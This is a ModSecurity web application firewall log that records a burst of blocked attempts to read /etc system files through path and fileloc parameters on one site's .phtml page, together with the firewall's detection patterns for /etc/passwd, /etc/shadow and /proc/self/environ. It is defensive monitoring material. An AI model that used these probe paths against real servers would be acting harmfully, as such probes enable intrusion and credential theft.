[Thu Mar 19 14:38:12.724804 2026] [:error] [pid 8307:tid 140411691570944] [client 57.141.18.17:46622] [client 57.141.18.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0hL-FhjpZGs9ba8qHCAAAAwY"]
[Thu Mar 19 14:38:13.248312 2026] [:error] [pid 7545:tid 140411607643904] [client 57.141.18.6:46636] [client 57.141.18.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/freetds.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0hX8B84UptSoTJtYrUQAAAZA"]
[Thu Mar 19 14:38:14.087171 2026] [:error] [pid 7235:tid 140411624429312] [client 57.141.18.24:46648] [client 57.141.18.24] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0hvqxLDW4GITHUkSE2AAAAQ4"]
[Thu Mar 19 14:38:14.248216 2026] [:error] [pid 15826:tid 140411557287680] [client 57.141.18.57:46654] [client 57.141.18.57] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.cshrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0huoXxyEfFpUF8f8owwAAAVY"]
[Thu Mar 19 14:38:14.541978 2026] [:error] [pid 30077:tid 140411624429312] [client 57.141.18.8:46662] [client 57.141.18.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc1.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0hvu8EFLIOrSqIpvE2wAAAk4"]
[Thu Mar 19 14:38:14.603436 2026] [:error] [pid 27293:tid 140411716749056] [client 57.141.18.58:46664] [client 57.141.18.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0hv-YZRR_7pZ7nDKnmwAAA8M"]
[Thu Mar 19 14:38:15.115836 2026] [:error] [pid 17653:tid 140411683178240] [client 57.141.18.109:46678] [client 57.141.18.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo-ldap.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0h8df6f5d65gmYZSWpgAAAsc"]
[Thu Mar 19 14:38:15.232562 2026] [:error] [pid 8307:tid 140411725141760] [client 57.141.18.37:46684] [client 57.141.18.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release-upstream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0h7-FhjpZGs9ba8qHCQAAAwI"]
[Thu Mar 19 14:38:15.637469 2026] [:error] [pid 27293:tid 140411590858496] [client 57.141.18.122:46692] [client 57.141.18.122] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0h_-YZRR_7pZ7nDKnnAAAA9I"]
[Thu Mar 19 14:38:16.413650 2026] [:error] [pid 7235:tid 140411733534464] [client 57.141.18.2:46710] [client 57.141.18.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0iPqxLDW4GITHUkSE2QAAAQE"]
[Thu Mar 19 14:38:16.433594 2026] [:error] [pid 17653:tid 140411632822016] [client 57.141.18.39:46714] [client 57.141.18.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sasl2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0iMdf6f5d65gmYZSWpwAAAs0"]
[Thu Mar 19 14:38:16.771150 2026] [:error] [pid 27293:tid 140411658000128] [client 57.141.18.121:46718] [client 57.141.18.121] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0iP-YZRR_7pZ7nDKnnQAAA8o"]
[Thu Mar 19 14:38:17.265467 2026] [:error] [pid 26799:tid 140411557287680] [client 57.141.18.92:46736] [client 57.141.18.92] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/shells"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0ida6ubjKNq_cu4Zy5wAAA1Y"]
[Thu Mar 19 14:38:17.288125 2026] [:error] [pid 26799:tid 140411741927168] [client 57.141.18.34:46738] [client 57.141.18.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tcsd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0ida6ubjKNq_cu4Zy6AAAA0A"]
[Thu Mar 19 14:38:17.554153 2026] [:error] [pid 8307:tid 140411658000128] [client 57.141.18.73:46742] [client 57.141.18.73] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0ib-FhjpZGs9ba8qHCgAAAwo"]
[Thu Mar 19 14:38:17.839360 2026] [:error] [pid 7235:tid 140411708356352] [client 57.141.18.24:46750] [client 57.141.18.24] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0ifqxLDW4GITHUkSE2gAAAQQ"]
[Thu Mar 19 14:38:18.333908 2026] [:error] [pid 15826:tid 140411741927168] [client 57.141.18.118:46758] [client 57.141.18.118] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0iuoXxyEfFpUF8f8oxgAAAUA"]
[Thu Mar 19 14:38:18.601296 2026] [:error] [pid 26799:tid 140411599251200] [client 57.141.18.74:46768] [client 57.141.18.74] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0ita6ubjKNq_cu4Zy6gAAA1E"]
[Thu Mar 19 14:38:18.611660 2026] [:error] [pid 17653:tid 140411548894976] [client 57.141.18.49:46770] [client 57.141.18.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dnsmasq.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0isdf6f5d65gmYZSWqAAAAtc"]
[Thu Mar 19 14:38:18.930815 2026] [:error] [pid 27293:tid 140411725141760] [client 57.141.18.66:46778] [client 57.141.18.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0iv-YZRR_7pZ7nDKnnwAAA8I"]
[Thu Mar 19 14:38:19.395831 2026] [:error] [pid 7235:tid 140411716749056] [client 57.141.18.114:46784] [client 57.141.18.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mailcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0i_qxLDW4GITHUkSE2wAAAQM"]
[Thu Mar 19 14:38:19.614996 2026] [:error] [pid 17653:tid 140411725141760] [client 57.141.18.10:46794] [client 57.141.18.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grafana-agent.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0i8df6f5d65gmYZSWqgAAAsI"]
[Thu Mar 19 14:38:19.764935 2026] [:error] [pid 15826:tid 140411691570944] [client 57.141.18.72:46802] [client 57.141.18.72] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/pool.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0i-oXxyEfFpUF8f8oxwAAAUY"]
[Thu Mar 19 14:38:20.708227 2026] [:error] [pid 7545:tid 140411716749056] [client 57.141.18.61:46812] [client 57.141.18.61] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/motd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0jH8B84UptSoTJtYrUwAAAYM"]
[Thu Mar 19 14:38:20.777704 2026] [:error] [pid 14269:tid 140411683178240] [client 57.141.18.41:46816] [client 57.141.18.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.cache"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0jAbLMZ6AikZjR9V5rwAAAAc"]
[Thu Mar 19 14:38:21.304565 2026] [:error] [pid 30077:tid 140411599251200] [client 57.141.18.97:46826] [client 57.141.18.97] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0jfu8EFLIOrSqIpvE3wAAAlE"]
[Thu Mar 19 14:38:21.394893 2026] [:error] [pid 7235:tid 140411540502272] [client 57.141.18.92:46832] [client 57.141.18.92] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0jfqxLDW4GITHUkSE3QAAARg"]
[Thu Mar 19 14:38:21.947037 2026] [:error] [pid 17653:tid 140411741927168] [client 57.141.18.107:46842] [client 57.141.18.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sestatus.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0jcdf6f5d65gmYZSWqwAAAsA"]
[Thu Mar 19 14:38:22.316520 2026] [:error] [pid 7235:tid 140411674785536] [client 57.141.18.78:46848] [client 57.141.18.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inittab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0jvqxLDW4GITHUkSE3gAAAQg"]
